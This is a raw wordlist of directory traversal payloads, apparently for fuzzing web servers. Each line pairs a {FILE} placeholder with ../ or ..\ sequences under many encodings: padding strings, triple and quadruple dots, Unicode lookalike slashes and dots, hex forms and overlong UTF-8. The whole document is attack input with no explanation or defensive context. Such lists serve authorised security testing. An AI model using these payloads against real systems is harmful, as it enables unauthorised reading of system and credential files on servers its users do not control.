AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.../{FILE}&lt;br /&gt;
.../.../{FILE}&lt;br /&gt;
.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../.../.../{FILE}&lt;br /&gt;
...\{FILE}&lt;br /&gt;
...\...\{FILE}&lt;br /&gt;
...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\...\...\{FILE}&lt;br /&gt;
..../{FILE}&lt;br /&gt;
..../..../{FILE}&lt;br /&gt;
..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../..../..../{FILE}&lt;br /&gt;
....\{FILE}&lt;br /&gt;
....\....\{FILE}&lt;br /&gt;
....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\....\....\{FILE}&lt;br /&gt;
........................................................................../{FILE}&lt;br /&gt;
........................................................................../../{FILE}&lt;br /&gt;
........................................................................../../../{FILE}&lt;br /&gt;
........................................................................../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../../../{FILE}&lt;br /&gt;
..........................................................................\{FILE}&lt;br /&gt;
..........................................................................\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
